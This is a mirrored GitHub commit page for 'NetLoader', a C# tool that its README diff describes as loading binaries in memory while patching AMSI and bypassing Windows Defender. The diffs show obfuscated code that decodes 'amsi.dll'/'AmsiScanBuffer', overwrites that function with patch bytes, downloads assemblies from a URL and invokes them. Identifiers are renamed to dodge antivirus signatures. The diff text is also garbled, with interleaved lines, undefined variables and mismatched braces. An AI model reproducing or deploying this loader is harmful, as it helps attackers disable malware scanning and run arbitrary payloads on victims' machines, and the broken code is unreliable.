mirror of
https://github.com/Flangvik/NetLoader
synced 2026-06-21 13:43:06 +00:00
Dirty refud, next release will be much cleaner
This commit is contained in:
+101
-116
@@ -10,121 +10,124 @@
|
||||
<Code Type="Class" Language="cs">
|
||||
<![CDATA[
|
||||
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
//This if for MSBuild LOL bin stuff later
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
using System.Reflection;
|
||||
|
||||
|
||||
//This if for MSBuild LOL bin stuff later
|
||||
using Microsoft.Build.Framework;
|
||||
using Microsoft.Build.Utilities;
|
||||
public class FillaCaryatidic{
|
||||
private static WebClient FourrierSplaying = new WebClient() { };
|
||||
[System.Runtime.InteropServices.DllImport("kernel32", EntryPoint = "#965")]
|
||||
private static extern IntPtr AmgarnQuistron(string HypophoriaCommand);
|
||||
[System.Runtime.InteropServices.DllImport("kernel32", EntryPoint = "#1500")]
|
||||
private static WebClient EngendersPipra = new WebClient() { };
|
||||
private static extern IntPtr VeldskoenPantatype(IntPtr NoninfinitenessPetrolist, UIntPtr UnprinciplednessUnderzealous, uint FlaskfulHyperalgesis, out uint HemophagyPsia);
|
||||
[System.Runtime.InteropServices.DllImport("kernel32", EntryPoint = "#694")]
|
||||
private static extern IntPtr WolterTrap(IntPtr GrownTremulando, string MinerologistToft);
|
||||
private static void BiocatalyticCounterexercise(MethodInfo BlockishBushranging, object[] NongaseousGauziness = null)
|
||||
{
|
||||
[DllImport("ker" +"nel" + "32")]
|
||||
//BlockishBushranging.Invoke(null, new object[] { new string[] { CanephoroeGravure } });
|
||||
BlockishBushranging.Invoke(null, NongaseousGauziness);
|
||||
}
|
||||
return EngendersPipra.DownloadData(SemitheologicallyProtocolist);
|
||||
public static void Main(string[] args)
|
||||
{
|
||||
SecurityProtocolType SupplianceSheetings = (SecurityProtocolType)(3070 + 2);
|
||||
Console.WriteLine("[!] ~Flangvik #NetLoader");
|
||||
Console.WriteLine("[!] ~Flangvik #NetLoader");
|
||||
AbirritatingSoaper();
|
||||
while (true)
|
||||
while (true)
|
||||
{
|
||||
{
|
||||
try
|
||||
{
|
||||
{
|
||||
ServicePointManager.SecurityProtocol = SupplianceSheetings;
|
||||
if (args.Length == 0)
|
||||
{
|
||||
List<string> NesliaJokeless = MacersInequigranular();
|
||||
List<string> ColocolaIntestiniform = RefinishDesalters();
|
||||
Console.WriteLine("[+] Select a binary (number)>");
|
||||
Console.WriteLine("[+] Select a binary (number)>");
|
||||
Console.WriteLine("------------------------");
|
||||
Console.WriteLine("[0] - Exit NetLoader");
|
||||
for (int BoothsPorthole = 0; BoothsPorthole < NesliaJokeless.Count; BoothsPorthole++)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[" + (BoothsPorthole + 1) + "] - " + NesliaJokeless[BoothsPorthole]);
|
||||
if (BoothsPorthole == NesliaJokeless.Count - 1)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[" + (WhauBulbospinal + 2) + "] - Custom PATH or URL ");
|
||||
}
|
||||
}
|
||||
Console.WriteLine("[" + (BoothsPorthole + 2) + "] - Custom PATH or URL ");
|
||||
}
|
||||
}
|
||||
Console.WriteLine("-----------------------");
|
||||
var AutocytolyticSucuri = Console.ReadLine();
|
||||
var SudorificFavellidium = Console.ReadLine();
|
||||
if (Convert.ToInt32(AutocytolyticSucuri) == 0)
|
||||
{
|
||||
System.Environment.Exit(1);
|
||||
}
|
||||
else if (Convert.ToInt32(AutocytolyticSucuri) - 1 == NesliaJokeless.Count)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[+] Input your own URL / Local Path / direct link to binary");
|
||||
string CarboxylationLacrimator = Console.ReadLine();
|
||||
Console.WriteLine("[+] Input your own URL / Local Path / direct link to binary");
|
||||
string AdducersDiathermaneity = Console.ReadLine();
|
||||
Console.WriteLine("[+] Provide CanephoroeGravure for {0} >", AdducersDiathermaneity);
|
||||
string AshakeBrowsed = Console.ReadLine();
|
||||
EcologyRepressory("", AshakeBrowsed, AdducersDiathermaneity, false);
|
||||
}
|
||||
else if (Convert.ToInt32(AutocytolyticSucuri) - 1 > NesliaJokeless.Count | Convert.ToInt32(AutocytolyticSucuri) - 1 < 0)
|
||||
else if (Convert.ToInt32(SudorificFavellidium) - 1 > ColocolaIntestiniform.Count | Convert.ToInt32(SudorificFavellidium) - 1 < 0)
|
||||
{
|
||||
Console.WriteLine("[!] Bad Input, sry!");
|
||||
{
|
||||
Console.WriteLine("[!] Bad Input, sry!");
|
||||
}
|
||||
else
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[+] Provide CanephoroeGravure for {0} >", NesliaJokeless[Convert.ToInt32(AutocytolyticSucuri) - 1]);
|
||||
string AshakeBrowsed = Console.ReadLine();
|
||||
string PancakeMorphotonemic = Console.ReadLine();
|
||||
DiadochiCorralling(ColocolaIntestiniform[Convert.ToInt32(SudorificFavellidium) - 1], PancakeMorphotonemic);
|
||||
EcologyRepressory(NesliaJokeless[Convert.ToInt32(AutocytolyticSucuri) - 1], AshakeBrowsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
else
|
||||
{
|
||||
string TzarevnaSuccussive = "";
|
||||
string UneuphemisticPhaneromere = "";
|
||||
string GallootsPareciousness = "";
|
||||
bool SignificalImmethodically = false;
|
||||
foreach (var argument in args)
|
||||
{
|
||||
if (argument.ToLower().Contains("path"))
|
||||
if (argument.ToLower().Contains("PollinicSmoothen"))
|
||||
{
|
||||
var MicromesenteryLiparidae = Array.IndexOf(args, argument) + 1;
|
||||
if (MicromesenteryLiparidae < args.Length)
|
||||
if (DegelatinizeTestudo < args.Length)
|
||||
{
|
||||
{
|
||||
var IndwellSurveyed = args[Array.IndexOf(args, argument) + 1];
|
||||
if (SignificalImmethodically)
|
||||
if (DiosmoticPunster)
|
||||
SegregableVerandaed = Encoding.UTF8.GetString(Convert.FromBase64String(InterroomLycees));
|
||||
else
|
||||
TzarevnaSuccussive = Encoding.UTF8.GetString(Convert.FromBase64String(IndwellSurveyed));
|
||||
else
|
||||
TzarevnaSuccussive = IndwellSurveyed;
|
||||
}
|
||||
}
|
||||
}
|
||||
if (argument.ToLower().Contains("b64"))
|
||||
SignificalImmethodically = true;
|
||||
if (argument.ToLower().Contains("args"))
|
||||
if (argument.ToLower().Contains("args"))
|
||||
{
|
||||
var MicromesenteryLiparidae = Array.IndexOf(args, argument) + 1;
|
||||
var DegelatinizeTestudo = Array.IndexOf(args, argument) + 1;
|
||||
if (MicromesenteryLiparidae < args.Length)
|
||||
{
|
||||
{
|
||||
var IndwellSurveyedArgs = args[Array.IndexOf(args, argument) + 1];
|
||||
if (SignificalImmethodically)
|
||||
if (DiosmoticPunster)
|
||||
GallootsPareciousness = Encoding.UTF8.GetString(Convert.FromBase64String(InterroomLyceesArgs));
|
||||
UneuphemisticPhaneromere = Encoding.UTF8.GetString(Convert.FromBase64String(IndwellSurveyedArgs));
|
||||
else
|
||||
UneuphemisticPhaneromere = IndwellSurveyedArgs;
|
||||
GallootsPareciousness = InterroomLyceesArgs;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if (args.Length == 1 && string.IsNullOrEmpty(UneuphemisticPhaneromere) && string.IsNullOrEmpty(TzarevnaSuccussive) && !SignificalImmethodically)
|
||||
{
|
||||
{
|
||||
TzarevnaSuccussive = args[0];
|
||||
}
|
||||
if (args.Length == 2 && string.IsNullOrEmpty(UneuphemisticPhaneromere) && string.IsNullOrEmpty(TzarevnaSuccussive) && !SignificalImmethodically)
|
||||
if (args.Length == 2 && string.IsNullOrEmpty(GallootsPareciousness) && string.IsNullOrEmpty(SegregableVerandaed) && !DiosmoticPunster)
|
||||
{
|
||||
UneuphemisticPhaneromere = args[1];
|
||||
GallootsPareciousness = args[1];
|
||||
TzarevnaSuccussive = args[0];
|
||||
}
|
||||
}
|
||||
if (args.Length == 3 && string.IsNullOrEmpty(GallootsPareciousness) && string.IsNullOrEmpty(SegregableVerandaed) && DiosmoticPunster)
|
||||
if (args.Length == 3 && string.IsNullOrEmpty(UneuphemisticPhaneromere) && string.IsNullOrEmpty(TzarevnaSuccussive) && SignificalImmethodically)
|
||||
{
|
||||
TzarevnaSuccussive = Encoding.UTF8.GetString(Convert.FromBase64String(args[1]));
|
||||
UneuphemisticPhaneromere = Encoding.UTF8.GetString(Convert.FromBase64String(args[2]));
|
||||
}
|
||||
@@ -132,88 +135,70 @@ using System;
using System.Collections.Generic;
using System.IO;
using System.Ne
|
||||
{
|
||||
if (!string.IsNullOrEmpty(args[1]))
|
||||
TzarevnaSuccussive = Encoding.UTF8.GetString(Convert.FromBase64String(args[1]));
|
||||
SegregableVerandaed = Encoding.UTF8.GetString(Convert.FromBase64String(args[1]));
|
||||
}
|
||||
if (!string.IsNullOrEmpty(TzarevnaSuccussive))
|
||||
{
|
||||
Console.WriteLine("[+] {0} args -> {1}", TzarevnaSuccussive, UneuphemisticPhaneromere);
|
||||
EcologyRepressory("", UneuphemisticPhaneromere, TzarevnaSuccussive, false);
|
||||
Environment.Exit(0);
|
||||
Environment.Exit(0);
|
||||
}
|
||||
Environment.Exit(0);
|
||||
Environment.Exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[!] Damn, it failed, to bad");
|
||||
Console.WriteLine("[!] {0}", ex.Message);
|
||||
Environment.Exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
private static void CornGentlemens(byte[] SemisuccessUnwreathing, IntPtr HierologyIntralogical)
|
||||
{
|
||||
Marshal.Copy(SemisuccessUnwreathing, 0, HierologyIntralogical, SemisuccessUnwreathing.Length);
|
||||
}
|
||||
private static void EntomotaxyExtrahepatic(bool EsophagoscopyHyperorthodox = false)
|
||||
{
|
||||
try
|
||||
{
|
||||
var SharebrokerGlossolaly = LoadLibrary(Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));
|
||||
IntPtr ProtuberantialUnsincere = GetProcAddress(SharebrokerGlossolaly, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));
|
||||
Console.WriteLine("[!] Failed");
|
||||
Console.WriteLine("[!] {0}", ex.Message);
|
||||
uint AntalkalisInterchaff = 0;
|
||||
var BirdseyeRhodophyta = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
|
||||
if (!System.Environment.Is64BitOperatingSystem)
|
||||
BirdseyeRhodophyta = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
|
||||
VirtualProtect(ProtuberantialUnsincere, (UIntPtr)BirdseyeRhodophyta.Length, PinknessesCoconqueror, out AntalkalisInterchaff);
|
||||
CornGentlemens(BirdseyeRhodophyta, ProtuberantialUnsincere);
|
||||
Console.WriteLine("[+] Did the magic stuf..");
|
||||
}
|
||||
Environment.Exit(0);
|
||||
}
|
||||
{
|
||||
Console.WriteLine("[!] {0}", ex.Message);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
private static MethodInfo ButterflyerPiacularity(Assembly FalchionsSaccharorrhea)
|
||||
{
|
||||
//SulphethylicChloSlidefilmNarcisticata.Invoke(null, new object[] { new string[] { AngioparalysisConglomerator } });
|
||||
return FalchionsSaccharorrhea.EntryPoint;
|
||||
}
|
||||
}
|
||||
public static Assembly TartufesEssentialism(byte[] FestermentBroths)
|
||||
{
|
||||
return File.ReadAllBytes(PollinicSmoothen);
|
||||
}
|
||||
private static List<string> RefinishDesalters()
|
||||
{
|
||||
var MacrochelysCajaput = new List<string>() { };
|
||||
var PontificallyBangiales = EngendersPipra.DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cHM6Ly9naXRodWIuY29tL0ZsYW5ndmlrL05ldExvYWRlci90cmVlL21hc3Rlci9CaW5hcmllcw==")));
|
||||
return Assembly.Load(FestermentBroths);
|
||||
}
|
||||
private static List<string> MacersInequigranular()
|
||||
{
|
||||
foreach (var match in SatietyRaisings.Matches(PontificallyBangiales))
|
||||
{
|
||||
MacrochelysCajaput.Add(match.ToString().TrimStart('/'));
|
||||
}
|
||||
return MacrochelysCajaput;
|
||||
}
|
||||
public static Assembly DownfallingEpithalamiast(byte[] VibrativeAvians){
|
||||
return Assembly.Load(VibrativeAvians);
|
||||
}
|
||||
var NoblessesElevates = new List<string>() { };
|
||||
System.Text.RegularExpressions.Regex OnomatopoesyOrdinariest = new System.Text.RegularExpressions.Regex(@"\/[A-Za-z]{0,50}\.bin", System.Text.RegularExpressions.RegexOptions.IgnoreCase);
|
||||
foreach (var match in OnomatopoesyOrdinariest.Matches(FourrierSplaying.DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cHM6Ly9naXRodWIuY29tL0ZsYW5ndmlrL05ldExvYWRlci90cmVlL21hc3Rlci9CaW5hcmllcw==")))))
|
||||
{
|
||||
if (!SpongeflyRiverfront)
|
||||
{
|
||||
NoblessesElevates.Add(match.ToString().TrimStart('/'));
|
||||
}
|
||||
return NoblessesElevates;
|
||||
}
|
||||
public static void EcologyRepressory(string PresubordinatedHutched, string CanephoroeGravure = "", string EnsueDesegmentation = "", bool SunnClarifiers = true)
|
||||
{
|
||||
{
|
||||
if (!SunnClarifiers)
|
||||
{
|
||||
}
|
||||
else
|
||||
{
|
||||
HesitatersPerivaginal(EructsTinnier(DownfallingEpithalamiast(MusicologiesAggregatae(ConcertmasterRetinued))),ResinolicSansei);
|
||||
BiocatalyticCounterexercise(ButterflyerPiacularity(TartufesEssentialism(AdenocarcinomasLums(EnsueDesegmentation))), new object[] { new string[] { CanephoroeGravure } });
|
||||
}
|
||||
else
|
||||
{
|
||||
PresubordinatedHutched = "/" + PresubordinatedHutched + Encoding.UTF8.GetString(Convert.FromBase64String("P3Jhdz10cnVl"));
|
||||
string PersuasoryDovened = "";
|
||||
BiocatalyticCounterexercise(ButterflyerPiacularity(TartufesEssentialism(AdenocarcinomasLums(
|
||||
(Encoding.UTF8.GetString(Convert.FromBase64String(("aHR0cHM6Ly9naXRod_IuY29tL0ZsY_5ndmlrL05ldExvY_Rlci90cmVlL21hc3Rlci9Ca_5hcmllcw==").Replace("_", "W"))) + PresubordinatedHutched).Replace("tree", "blob")))), new object[] { new string[] { CanephoroeGravure } });
|
||||
}
|
||||
}
|
||||
public static byte[] AdenocarcinomasLums(string UnmistakablenessPocketful)
|
||||
{
|
||||
if (UnmistakablenessPocketful.StartsWith("http"))
|
||||
return FourrierSplaying.DownloadData(UnmistakablenessPocketful);
|
||||
return File.ReadAllBytes(UnmistakablenessPocketful);
|
||||
}
|
||||
private static void AbirritatingSoaper(bool PolycraticMacroinstruction = false)
|
||||
{
|
||||
Console.WriteLine("[+] Doing the thing");
|
||||
IntPtr SpiringConqueress = WolterTrap(AmgarnQuistron(Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw="))), Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));
|
||||
uint AntiliftDragooning = 0x40;
|
||||
uint CliverMustaches = 0;
|
||||
var MydaidaeJeeringly = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
|
||||
}
|
||||
if (System.Environment.Is64BitOperatingSystem)
|
||||
MydaidaeJeeringly = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
|
||||
var CapeworkErythrocytic = VeldskoenPantatype(SpiringConqueress, (UIntPtr)MydaidaeJeeringly.Length, AntiliftDragooning, out CliverMustaches);
|
||||
if (CapeworkErythrocytic != null)
|
||||
|
||||
@@ -4,7 +4,7 @@ Loads any C# binary in mem, patching AMSI and bypassing Windows Defender
|
||||
The binaries in this repo SHOULD be all clean and newly compiled from their respective GitHub repos, but feel free to compile / host your own.
|
||||
(Don't consider running binaries from this repo good OPSEC)
|
||||
|
||||
Latest update / signature fix was 03.06.2020, clean as a whistle
|
||||
Latest update / signature fix was 09.06.2020, clean as a whistle
|
||||
Currently doing 24/7 signature checks, so let's see how long it takes this time
|
||||
|
||||
Code is designed to deploy binaries from a GitHub repo, so should be straight forward.
|
||||
|
||||
+101
-116
@@ -1,118 +1,121 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
//This if for MSBuild LOL bin stuff later
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
using System.Reflection;
|
||||
|
||||
|
||||
//This if for MSBuild LOL bin stuff later
|
||||
//using Microsoft.Build.Framework;
|
||||
//using Microsoft.Build.Utilities;
|
||||
public class FillaCaryatidic{
|
||||
private static WebClient FourrierSplaying = new WebClient() { };
|
||||
[System.Runtime.InteropServices.DllImport("kernel32", EntryPoint = "#965")]
|
||||
private static extern IntPtr AmgarnQuistron(string HypophoriaCommand);
|
||||
[System.Runtime.InteropServices.DllImport("kernel32", EntryPoint = "#1500")]
|
||||
private static WebClient EngendersPipra = new WebClient() { };
|
||||
private static extern IntPtr VeldskoenPantatype(IntPtr NoninfinitenessPetrolist, UIntPtr UnprinciplednessUnderzealous, uint FlaskfulHyperalgesis, out uint HemophagyPsia);
|
||||
[System.Runtime.InteropServices.DllImport("kernel32", EntryPoint = "#694")]
|
||||
private static extern IntPtr WolterTrap(IntPtr GrownTremulando, string MinerologistToft);
|
||||
private static void BiocatalyticCounterexercise(MethodInfo BlockishBushranging, object[] NongaseousGauziness = null)
|
||||
{
|
||||
[DllImport("ker" +"nel" + "32")]
|
||||
//BlockishBushranging.Invoke(null, new object[] { new string[] { CanephoroeGravure } });
|
||||
BlockishBushranging.Invoke(null, NongaseousGauziness);
|
||||
}
|
||||
return EngendersPipra.DownloadData(SemitheologicallyProtocolist);
|
||||
public static void Main(string[] args)
|
||||
{
|
||||
SecurityProtocolType SupplianceSheetings = (SecurityProtocolType)(3070 + 2);
|
||||
Console.WriteLine("[!] ~Flangvik #NetLoader");
|
||||
Console.WriteLine("[!] ~Flangvik #NetLoader");
|
||||
AbirritatingSoaper();
|
||||
while (true)
|
||||
while (true)
|
||||
{
|
||||
{
|
||||
try
|
||||
{
|
||||
{
|
||||
ServicePointManager.SecurityProtocol = SupplianceSheetings;
|
||||
if (args.Length == 0)
|
||||
{
|
||||
List<string> NesliaJokeless = MacersInequigranular();
|
||||
List<string> ColocolaIntestiniform = RefinishDesalters();
|
||||
Console.WriteLine("[+] Select a binary (number)>");
|
||||
Console.WriteLine("[+] Select a binary (number)>");
|
||||
Console.WriteLine("------------------------");
|
||||
Console.WriteLine("[0] - Exit NetLoader");
|
||||
for (int BoothsPorthole = 0; BoothsPorthole < NesliaJokeless.Count; BoothsPorthole++)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[" + (BoothsPorthole + 1) + "] - " + NesliaJokeless[BoothsPorthole]);
|
||||
if (BoothsPorthole == NesliaJokeless.Count - 1)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[" + (WhauBulbospinal + 2) + "] - Custom PATH or URL ");
|
||||
}
|
||||
}
|
||||
Console.WriteLine("[" + (BoothsPorthole + 2) + "] - Custom PATH or URL ");
|
||||
}
|
||||
}
|
||||
Console.WriteLine("-----------------------");
|
||||
var AutocytolyticSucuri = Console.ReadLine();
|
||||
var SudorificFavellidium = Console.ReadLine();
|
||||
if (Convert.ToInt32(AutocytolyticSucuri) == 0)
|
||||
{
|
||||
System.Environment.Exit(1);
|
||||
}
|
||||
else if (Convert.ToInt32(AutocytolyticSucuri) - 1 == NesliaJokeless.Count)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[+] Input your own URL / Local Path / direct link to binary");
|
||||
string CarboxylationLacrimator = Console.ReadLine();
|
||||
Console.WriteLine("[+] Input your own URL / Local Path / direct link to binary");
|
||||
string AdducersDiathermaneity = Console.ReadLine();
|
||||
Console.WriteLine("[+] Provide CanephoroeGravure for {0} >", AdducersDiathermaneity);
|
||||
string AshakeBrowsed = Console.ReadLine();
|
||||
EcologyRepressory("", AshakeBrowsed, AdducersDiathermaneity, false);
|
||||
}
|
||||
else if (Convert.ToInt32(AutocytolyticSucuri) - 1 > NesliaJokeless.Count | Convert.ToInt32(AutocytolyticSucuri) - 1 < 0)
|
||||
else if (Convert.ToInt32(SudorificFavellidium) - 1 > ColocolaIntestiniform.Count | Convert.ToInt32(SudorificFavellidium) - 1 < 0)
|
||||
{
|
||||
Console.WriteLine("[!] Bad Input, sry!");
|
||||
{
|
||||
Console.WriteLine("[!] Bad Input, sry!");
|
||||
}
|
||||
else
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[+] Provide CanephoroeGravure for {0} >", NesliaJokeless[Convert.ToInt32(AutocytolyticSucuri) - 1]);
|
||||
string AshakeBrowsed = Console.ReadLine();
|
||||
string PancakeMorphotonemic = Console.ReadLine();
|
||||
DiadochiCorralling(ColocolaIntestiniform[Convert.ToInt32(SudorificFavellidium) - 1], PancakeMorphotonemic);
|
||||
EcologyRepressory(NesliaJokeless[Convert.ToInt32(AutocytolyticSucuri) - 1], AshakeBrowsed);
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
else
|
||||
{
|
||||
string TzarevnaSuccussive = "";
|
||||
string UneuphemisticPhaneromere = "";
|
||||
string GallootsPareciousness = "";
|
||||
bool SignificalImmethodically = false;
|
||||
foreach (var argument in args)
|
||||
{
|
||||
if (argument.ToLower().Contains("path"))
|
||||
if (argument.ToLower().Contains("PollinicSmoothen"))
|
||||
{
|
||||
var MicromesenteryLiparidae = Array.IndexOf(args, argument) + 1;
|
||||
if (MicromesenteryLiparidae < args.Length)
|
||||
if (DegelatinizeTestudo < args.Length)
|
||||
{
|
||||
{
|
||||
var IndwellSurveyed = args[Array.IndexOf(args, argument) + 1];
|
||||
if (SignificalImmethodically)
|
||||
if (DiosmoticPunster)
|
||||
SegregableVerandaed = Encoding.UTF8.GetString(Convert.FromBase64String(InterroomLycees));
|
||||
else
|
||||
TzarevnaSuccussive = Encoding.UTF8.GetString(Convert.FromBase64String(IndwellSurveyed));
|
||||
else
|
||||
TzarevnaSuccussive = IndwellSurveyed;
|
||||
}
|
||||
}
|
||||
}
|
||||
if (argument.ToLower().Contains("b64"))
|
||||
SignificalImmethodically = true;
|
||||
if (argument.ToLower().Contains("args"))
|
||||
if (argument.ToLower().Contains("args"))
|
||||
{
|
||||
var MicromesenteryLiparidae = Array.IndexOf(args, argument) + 1;
|
||||
var DegelatinizeTestudo = Array.IndexOf(args, argument) + 1;
|
||||
if (MicromesenteryLiparidae < args.Length)
|
||||
{
|
||||
{
|
||||
var IndwellSurveyedArgs = args[Array.IndexOf(args, argument) + 1];
|
||||
if (SignificalImmethodically)
|
||||
if (DiosmoticPunster)
|
||||
GallootsPareciousness = Encoding.UTF8.GetString(Convert.FromBase64String(InterroomLyceesArgs));
|
||||
UneuphemisticPhaneromere = Encoding.UTF8.GetString(Convert.FromBase64String(IndwellSurveyedArgs));
|
||||
else
|
||||
UneuphemisticPhaneromere = IndwellSurveyedArgs;
|
||||
GallootsPareciousness = InterroomLyceesArgs;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if (args.Length == 1 && string.IsNullOrEmpty(UneuphemisticPhaneromere) && string.IsNullOrEmpty(TzarevnaSuccussive) && !SignificalImmethodically)
|
||||
{
|
||||
{
|
||||
TzarevnaSuccussive = args[0];
|
||||
}
|
||||
if (args.Length == 2 && string.IsNullOrEmpty(UneuphemisticPhaneromere) && string.IsNullOrEmpty(TzarevnaSuccussive) && !SignificalImmethodically)
|
||||
if (args.Length == 2 && string.IsNullOrEmpty(GallootsPareciousness) && string.IsNullOrEmpty(SegregableVerandaed) && !DiosmoticPunster)
|
||||
{
|
||||
UneuphemisticPhaneromere = args[1];
|
||||
GallootsPareciousness = args[1];
|
||||
TzarevnaSuccussive = args[0];
|
||||
}
|
||||
}
|
||||
if (args.Length == 3 && string.IsNullOrEmpty(GallootsPareciousness) && string.IsNullOrEmpty(SegregableVerandaed) && DiosmoticPunster)
|
||||
if (args.Length == 3 && string.IsNullOrEmpty(UneuphemisticPhaneromere) && string.IsNullOrEmpty(TzarevnaSuccussive) && SignificalImmethodically)
|
||||
{
|
||||
TzarevnaSuccussive = Encoding.UTF8.GetString(Convert.FromBase64String(args[1]));
|
||||
UneuphemisticPhaneromere = Encoding.UTF8.GetString(Convert.FromBase64String(args[2]));
|
||||
}
|
||||
@@ -120,88 +123,70 @@ using System;
using System.Collections.Generic;
using System.IO;
using System.Ne
|
||||
{
|
||||
if (!string.IsNullOrEmpty(args[1]))
|
||||
TzarevnaSuccussive = Encoding.UTF8.GetString(Convert.FromBase64String(args[1]));
|
||||
SegregableVerandaed = Encoding.UTF8.GetString(Convert.FromBase64String(args[1]));
|
||||
}
|
||||
if (!string.IsNullOrEmpty(TzarevnaSuccussive))
|
||||
{
|
||||
Console.WriteLine("[+] {0} args -> {1}", TzarevnaSuccussive, UneuphemisticPhaneromere);
|
||||
EcologyRepressory("", UneuphemisticPhaneromere, TzarevnaSuccussive, false);
|
||||
Environment.Exit(0);
|
||||
Environment.Exit(0);
|
||||
}
|
||||
Environment.Exit(0);
|
||||
Environment.Exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
{
|
||||
Console.WriteLine("[!] Damn, it failed, to bad");
|
||||
Console.WriteLine("[!] {0}", ex.Message);
|
||||
Environment.Exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
private static void CornGentlemens(byte[] SemisuccessUnwreathing, IntPtr HierologyIntralogical)
|
||||
{
|
||||
Marshal.Copy(SemisuccessUnwreathing, 0, HierologyIntralogical, SemisuccessUnwreathing.Length);
|
||||
}
|
||||
private static void EntomotaxyExtrahepatic(bool EsophagoscopyHyperorthodox = false)
|
||||
{
|
||||
try
|
||||
{
|
||||
var SharebrokerGlossolaly = LoadLibrary(Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));
|
||||
IntPtr ProtuberantialUnsincere = GetProcAddress(SharebrokerGlossolaly, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));
|
||||
Console.WriteLine("[!] Failed");
|
||||
Console.WriteLine("[!] {0}", ex.Message);
|
||||
uint AntalkalisInterchaff = 0;
|
||||
var BirdseyeRhodophyta = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
|
||||
if (!System.Environment.Is64BitOperatingSystem)
|
||||
BirdseyeRhodophyta = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
|
||||
VirtualProtect(ProtuberantialUnsincere, (UIntPtr)BirdseyeRhodophyta.Length, PinknessesCoconqueror, out AntalkalisInterchaff);
|
||||
CornGentlemens(BirdseyeRhodophyta, ProtuberantialUnsincere);
|
||||
Console.WriteLine("[+] Did the magic stuf..");
|
||||
}
|
||||
Environment.Exit(0);
|
||||
}
|
||||
{
|
||||
Console.WriteLine("[!] {0}", ex.Message);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
private static MethodInfo ButterflyerPiacularity(Assembly FalchionsSaccharorrhea)
|
||||
{
|
||||
//SulphethylicChloSlidefilmNarcisticata.Invoke(null, new object[] { new string[] { AngioparalysisConglomerator } });
|
||||
return FalchionsSaccharorrhea.EntryPoint;
|
||||
}
|
||||
}
|
||||
public static Assembly TartufesEssentialism(byte[] FestermentBroths)
|
||||
{
|
||||
return File.ReadAllBytes(PollinicSmoothen);
|
||||
}
|
||||
private static List<string> RefinishDesalters()
|
||||
{
|
||||
var MacrochelysCajaput = new List<string>() { };
|
||||
var PontificallyBangiales = EngendersPipra.DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cHM6Ly9naXRodWIuY29tL0ZsYW5ndmlrL05ldExvYWRlci90cmVlL21hc3Rlci9CaW5hcmllcw==")));
|
||||
return Assembly.Load(FestermentBroths);
|
||||
}
|
||||
private static List<string> MacersInequigranular()
|
||||
{
|
||||
foreach (var match in SatietyRaisings.Matches(PontificallyBangiales))
|
||||
{
|
||||
MacrochelysCajaput.Add(match.ToString().TrimStart('/'));
|
||||
}
|
||||
return MacrochelysCajaput;
|
||||
}
|
||||
public static Assembly DownfallingEpithalamiast(byte[] VibrativeAvians){
|
||||
return Assembly.Load(VibrativeAvians);
|
||||
}
|
||||
var NoblessesElevates = new List<string>() { };
|
||||
System.Text.RegularExpressions.Regex OnomatopoesyOrdinariest = new System.Text.RegularExpressions.Regex(@"\/[A-Za-z]{0,50}\.bin", System.Text.RegularExpressions.RegexOptions.IgnoreCase);
|
||||
foreach (var match in OnomatopoesyOrdinariest.Matches(FourrierSplaying.DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cHM6Ly9naXRodWIuY29tL0ZsYW5ndmlrL05ldExvYWRlci90cmVlL21hc3Rlci9CaW5hcmllcw==")))))
|
||||
{
|
||||
if (!SpongeflyRiverfront)
|
||||
{
|
||||
NoblessesElevates.Add(match.ToString().TrimStart('/'));
|
||||
}
|
||||
return NoblessesElevates;
|
||||
}
|
||||
